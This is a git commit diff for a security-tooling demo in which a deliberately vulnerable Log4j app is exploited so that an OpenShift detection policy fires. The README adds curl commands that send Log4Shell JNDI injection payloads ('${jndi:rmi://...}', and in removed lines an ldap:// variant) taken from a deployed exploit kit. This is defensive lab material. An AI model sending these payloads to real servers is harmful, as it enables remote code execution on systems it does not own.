fix pipeline notifications

.gitignore

@@ -1,2 +1,4 @@
 dockercfg
 *.bak
+log4shell.json
+

README.md

@@ -165,6 +165,12 @@ Deploy the vulnerable app.
 oc kustomize deployment | oc apply -f -
 ```
 
+Run the cleanup script.
+
+```
+ansible-playbook cleanup/cleanup.yaml
+```
+
 ## Demo scenario
 
 ### Build the inventory
@@ -178,7 +184,29 @@ oc kustomize deployment | oc apply -f -
 
 ### Intrusion
 
-* In a hidden terminal, run the JNDI Exploit Kit to trigger the "Shell spawned by Java application" policy
+In a hidden terminal, run the JNDI Exploit Kit to trigger the "Shell spawned by Java application" policy
+
+* Get the RMI URL with:
+
+  ```sh
+  oc logs -n exploitkit-log4j deploy/jndi-exploit-kit |grep -A1 "BYPASS WITH EL by @welk1n"
+  EXPLOIT_URL="$(oc logs -n exploitkit-log4j deploy/jndi-exploit-kit | grep -A1 "BYPASS WITH EL by @welk1n" | grep rmi:// | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g')"
+  ```
+
+* Find the URL of the vulnerable container.
+
+  ```sh
+  export TARGET="https://$(oc get route settlement-app -n vulnerable-log4j -o jsonpath="{.spec.host}")/"
+  ```
+
+* Send the exploit
+
+  ```sh
+  curl "$TARGET" -H "X-Name: \${jndi:$EXPLOIT_URL}"
+  ```
+
+Then, show the violation:
+
 * Open the **Violations** tab
 * Filter by **Namespace**: `vulnerable-log4j`
 * Go to the OpenShift console
@@ -186,7 +214,7 @@ oc kustomize deployment | oc apply -f -
 * Delete the pod
 * In the Central, clear the Violation
 * Drill down to **Platform Configuration** > **System policies**
-* Open the **Log4Shell** policy
+* Open the **Shell Spawned by Java Application** policy
 * Click the **Edit** button
 * On the fourth tab, show the automatic enforcement options
 
@@ -241,20 +269,6 @@ Cleanup
 
 ```sh
 oc kustomize deployment | oc delete -f -
-oc delete pods -n vulnerable-cicd --all
+oc delete pods,builds,pipelineruns -n vulnerable-cicd --all
 oc start-build vulnerable-log4j -n vulnerable-cicd
 ```
-
-## Exploit
-
-Find the URL of the vulnerable container.
-
-```sh
-export TARGET="https://$(oc get route settlement-app -n vulnerable-log4j -o jsonpath="{.spec.host}")/"
-```
-
-Go to https://log4shell.huntress.com/ and pass the generated string in the `X-Name` HTTP header.
-
-```sh
-curl "$TARGET" -H 'X-Name: ${jndi:ldap://log4shell.huntress.com:1389/e597d75d-1851-4133-9a08-d5dfd7e04264}'
-```

cicd/70-tasks.yaml

@@ -89,4 +89,4 @@ spec:
         NAME=`skopeo inspect "docker://$(params.image)" --format '{{.Name}}' --creds token:$TOKEN`
         curl -s -k -L -H "Authorization: Bearer $ROX_API_TOKEN" "https://$ROX_CENTRAL_ENDPOINT/api/cli/download/roxctl-linux" --output /tmp/roxctl  > /dev/null
         chmod +x /tmp/roxctl
-        /tmp/roxctl image check --insecure-skip-tls-verify -e "$ROX_CENTRAL_ENDPOINT" --image "$NAME@$DIGEST"
+        /tmp/roxctl image check --insecure-skip-tls-verify -e "$ROX_CENTRAL_ENDPOINT" --image "$NAME@$DIGEST" --send-notifications

policy/log4shell.json → policy/log4shell.json.template

@@ -1,7 +1,6 @@
 {
     "policies": [
         {
-            "id": "7f0ef11c-f9b1-4af1-9181-e24b1c27285c",
             "name": "Log4Shell",
             "description": "Alert on deployments with images containing the Log4Shell vulnerabilities (CVE-2021-44228 and CVE-2021-45046). There are flaws in the Java logging library Apache Log4j in versions from 2.0-beta9 to 2.15.0, excluding 2.12.2.",
             "rationale": "These vulnerabilities allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.",
@@ -24,7 +23,7 @@
                 "FAIL_BUILD_ENFORCEMENT"
             ],
             "notifiers": [
-                "27197fcf-5d2c-4fb6-a9bd-9e755f739944"
+                "{{ notifier_id }}"
             ],
             "lastUpdated": "2022-02-21T14:19:19.206939932Z",
             "SORTName": "",